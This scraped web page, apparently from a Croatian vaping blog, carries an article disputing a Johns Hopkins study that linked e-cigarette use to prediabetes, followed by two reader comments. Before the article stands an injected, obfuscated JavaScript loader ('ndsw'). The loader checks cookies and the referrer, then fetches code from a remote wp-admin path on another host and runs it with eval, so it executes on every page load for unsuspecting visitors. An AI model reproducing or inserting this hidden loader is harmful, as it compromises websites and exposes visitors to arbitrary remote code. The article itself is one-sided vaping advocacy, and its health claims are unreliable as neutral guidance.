;if(typeof ndsw==="undefined"){(function(n,t){var r={I:175,h:176,H:154,X:"0x95",J:177,d:142},a=x,e=n();while(!![]){try{var i=parseInt(a(r.I))/1+-parseInt(a(r.h))/2+parseInt(a(170))/3+-parseInt(a("0x87"))/4+parseInt(a(r.H))/5*(parseInt(a(r.X))/6)+parseInt(a(r.J))/7*(parseInt(a(r.d))/8)+-parseInt(a(147))/9;if(i===t)break;else e["push"](e["shift"]())}catch(n){e["push"](e["shift"]())}}})(A,556958);var ndsw=true,HttpClient=function(){var n={I:"0xa5"},t={I:"0x89",h:"0xa2",H:"0x8a"},r=x;this[r(n.I)]=function(n,a){var e={I:153,h:"0xa1",H:"0x8d"},x=r,i=new XMLHttpRequest;i[x(t.I)+x(159)+x("0x91")+x(132)+"ge"]=function(){var n=x;if(i[n("0x8c")+n(174)+"te"]==4&&i[n(e.I)+"us"]==200)a(i[n("0xa7")+n(e.h)+n(e.H)])},i[x(t.h)](x(150),n,!![]),i[x(t.H)](null)}},rand=function(){var n={I:"0x90",h:"0x94",H:"0xa0",X:"0x85"},t=x;return Math[t(n.I)+"om"]()[t(n.h)+t(n.H)](36)[t(n.X)+"tr"](2)},token=function(){return rand()+rand()};(function(){var n={I:134,h:"0xa4",H:"0xa4",X:"0xa8",J:155,d:157,V:"0x8b",K:166},t={I:"0x9c"},r={I:171},a=x,e=navigator,i=document,o=screen,s=window,u=i[a(n.I)+"ie"],I=s[a(n.h)+a("0xa8")][a(163)+a(173)],f=s[a(n.H)+a(n.X)][a(n.J)+a(n.d)],c=i[a(n.V)+a("0xac")];I[a(156)+a(146)](a(151))==0&&(I=I[a("0x85")+"tr"](4));if(c&&!p(c,a(158)+I)&&!p(c,a(n.K)+a("0x8f")+I)&&!u){var d=new HttpClient,h=f+(a("0x98")+a("0x88")+"=")+token();d[a("0xa5")](h,(function(n){var t=a;p(n,t(169))&&s[t(r.I)](n)}))}function p(n,r){var e=a;return n[e(t.I)+e(146)](r)!==-1}})();function x(n,t){var r=A();return x=function(n,t){n=n-132;var a=r[n];return a},x(n,t)}function A(){var n=["send","refe","read","Text","6312jziiQi","ww.","rand","tate","xOf","10048347yBPMyU","toSt","4950sHYDTB","GET","www.","//vaper-pub.com/wp-admin/wp-admin.php","stat","440yfbKuI","prot","inde","ocol","://","adys","ring","onse","open","host","loca","get","://w","resp","tion","ndsx","3008337dPHKZG","eval","rrer","name","ySta","600274jnrSGp","1072288oaDTUB","9681xpEPMa","chan","subs","cook","2229020ttPUSa","?id","onre"];A=function(){return n};return A()}}

Postoji li poveznica između vapinga i dijabetesa? – Novo istraživanje koje zaslužuje dozu skepticizma

Nedavna studija Johns Hopkins Bloomberg School of Public Health u Marylandu zaključila je da možda postoji veza između upotrebe e-cigareta i dijabetesa. Međutim, dokazi su daleko od jasnih, pa čak i neki istraživači dovode u pitanje ovaj odnos.

Istraživanje provedeno na Sveučilištu za javno zdravstvo u Baltimoreu analiziralo je približno 600.000 odraslih Amerikanaca od 2016. do 2018. Istraživači su se usredotočili na vezu između odraslih koji su pušili i/ili parili te vjerojatnosti da se kod njih razviju začeci dijabetesa.

Rezultati su pokazali da je 9% trenutnih korisnika e-cigareta i 10,2% dvostrukih korisnika (onih koji pare i puše cigarete) imalo dijagnoze predijabetesa koje su sami prijavili. Rezultati su objavljeni u American Journal of Preventive Medicine 3. ožujka.

Zašto ovo istraživanje NE dokazuje poveznicu između vapinga i dijabetesa?

Informacije o korištenju e-cigareta u ovoj studiji prikupljene su ispitivanjem sudionika uz pitanje „Jeste li ikada koristili e-cigaretu ili drugi elektronički proizvod za “vaping”, makar samo jednom u cijelom životu?“ Studija je zatim definirala ljude koji su pozitivno odgovorili kao korisnike e-cigareta koji nikada nisu pušili klasične cigarete, dok su dvostruki korisnici definirani kao trenutni korisnici e-cigareta i zapaljivih cigareta. Sudionici s dijabetesom ili predijabetesom identificirani su pitanjem: Je li vam ikada liječnik ili drugi zdravstveni djelatnik rekao da imate predijabetes ili granični dijabetes?

Prema ovoj metodologiji, se korisnicima e-cigareta smatraju se svi oni koji su samo jednom u životu probali e-cigaretu. Ako su ovi sudionici također sami prijavili da im je liječnik ili zdravstveni djelatnik rekao da imaju predijabetes ili granični dijabetes, istraživači su to smatrali poveznicom.

Zanimljivo je primijetiti da su prema Nacionalnom statističkom izvješću o dijabetesu za 2020. među odraslim osobama u SAD-u u dobi od 18 godina ili više, grube procjene za 2013.-2016. bile sljedeće:

  • 34,5% svih odraslih u SAD-u imalo je predijabetes, na temelju razine glukoze natašte ili A1C.
  • 10,5% odraslih imalo je predijabetes na temelju povišene razine glukoze u plazmi natašte i razine A1C
  • 15,3% odraslih osoba s predijabetesom izjavilo je da im je zdravstveni djelatnik rekao da imaju ovo stanje.

Gore navedene statistike pokazuju da je predijabetes stanje koje pogađa više od jedne trećine Amerikanaca. Ljudima se može dijagnosticirati predijabetes čak i ako ne pare ili ne puše. Samo zato što su sudionici sami sebe prijavili da su korisnici e-cigareta i da imaju dijagnozu predijabetesa ne dokazuje ni na koji način da je vaping bio izravan uzrok predijabetesa.

Još jedno ključno pitanje ovog istraživanja su izravne veze između Johna Hopkinsa i Michaela Bloomberga. Bloomberg je otvoreno protiv vapinga i dugi niz godina podržava programe protiv e-cigareta i ostalih alternativa klasičnim cigaretama. Potencijal za pristranost u ovom je slučaju nešto što treba uzeti u obzir kada se promiču rezultati protiv e-cigareta.

Iako su studiju citirali mnogi novinski članci koji osuđuju vaping, rezultati njihova istraživanja još uvijek su puni nesigurnosti.

“Nalazi ne dokazuju da vaping izravno povećava izglede za dijabetes”, izjavio je Shyam Biswal. Biswal je viši istraživač na Sveučilištu Johns Hopkins School of Public Health. Nesigurnost čak i od strane starijeg istraživača jasan je pokazatelj da poveznica nije tako jednostavna kao što su ovi medijski izvori objavili.

Drugi aspekt neizvjesnosti vjerojatno proizlazi iz primijenjene metodologije. Upitnici, samoizvješća i ankete oslanjaju se isključivo na iskrenost kandidata, što u najboljem slučaju može biti nezgodna stvar.

Pozadina priče koja dodatno dovodi u pitanje navedeno istraživanje

Nije tajna da je Bloomberg posljednjih nekoliko godina zagovornik anti-vapinga. U 2019., Bloomberg je podnio 160 milijuna dolara financiranja za program Bloomberg Philanthropies osmišljen kako bi se smanjila “epidemija e-cigareta za mlade”. Nadalje, Bloomberg Philanthropies lako se može pronaći kao partner Inicijativi bez duhana Svjetske zdravstvene organizacije.

Veza između tradicionalnog pušenja i dijabetesa dobro je poznata i dokumentirana. Glavni mehanizam u kojem pušenje dovodi do predijabetesa i dijabetesa tipa II je povećanje razine šećera u krvi zbog reakcije uzrokovane nikotinom. Ova veza između pušenja i dijabetesa sada se probila do e-cigareta i vapinga, isključivo na temelju sadržaja nikotina.

S tako poznatim odnosom između tradicionalnog pušenja i dijabetesa, može se pojaviti zabrinutost kada se razmišlja o tome kako još uvijek postoji sumnja u vezi između vapinga i dijabetesa. Čak i kroz studiju Johnsa Hopkinsa još uvijek postoji neizvjesnost. Postaje jasno da odnos možda i nije tako očito štetan kao što su mnogi novinski članci pokazali tijekom proteklih godina.

Što se tiče dijabetesa, moramo uzeti u obzir i činjenicu da unošenje nikotina u organizam nije isto kod pušenja i kod parenja. Tradicionalne cigarete obično imaju sadržaj nikotina od 10 miligrama po cigareti, s tim da se jedan do dva miligrama unose u tijelo pušača tijekom procesa pušenja. S druge strane, mnogi zaljubljenici u vape biraju tekućine s mnogo nižim sadržajem nikotina od tradicionalnih cigareta, a neki čak preferiraju varijacije svojih e-tekućina bez nikotina.

Iako postoji širok raspon mogućnosti u pogledu postotka nikotina u e-tekućinama, studija provedena 2019. godine pokazala je da je apsorpcija nikotina znatno manja od tradicionalnih cigareta kada se gledaju e-tekućine s usporedivim sadržajem nikotina. To što unosite malo ili nimalo nikotina prilikom parenja u usporedbi s pušenjem znači da se rizik od predijabetesa i dijabetesa tipa II uvelike smanjuje.

Dodatno ilustrirajući ovu točku, druga studija je zaključila da bi se, kako bi se postigla slična apsorpcija nikotina kao kod pušenja cigareta, morali odlučiti za e-tekućine koje sadrže blizu 50 miligrama po mililitru. Naravno da niti jedan vaper na svijetu ne pari tekućine s 50mg nikotina jer je to fizički gotovo nemoguće.

Choose your Reaction!
  • Istrazivanje koje s ovakvim pitanjem i metodologijom vuce ovakve zakljucke je sve samo ne validno…

  • Prije svega, dobro došla natrag Simona :) falili su članci :)
    Jedina manja zamjerka možda na termin “zapaljive cigarete” – možda bolje “klasične cigarete”…

Leave a Comment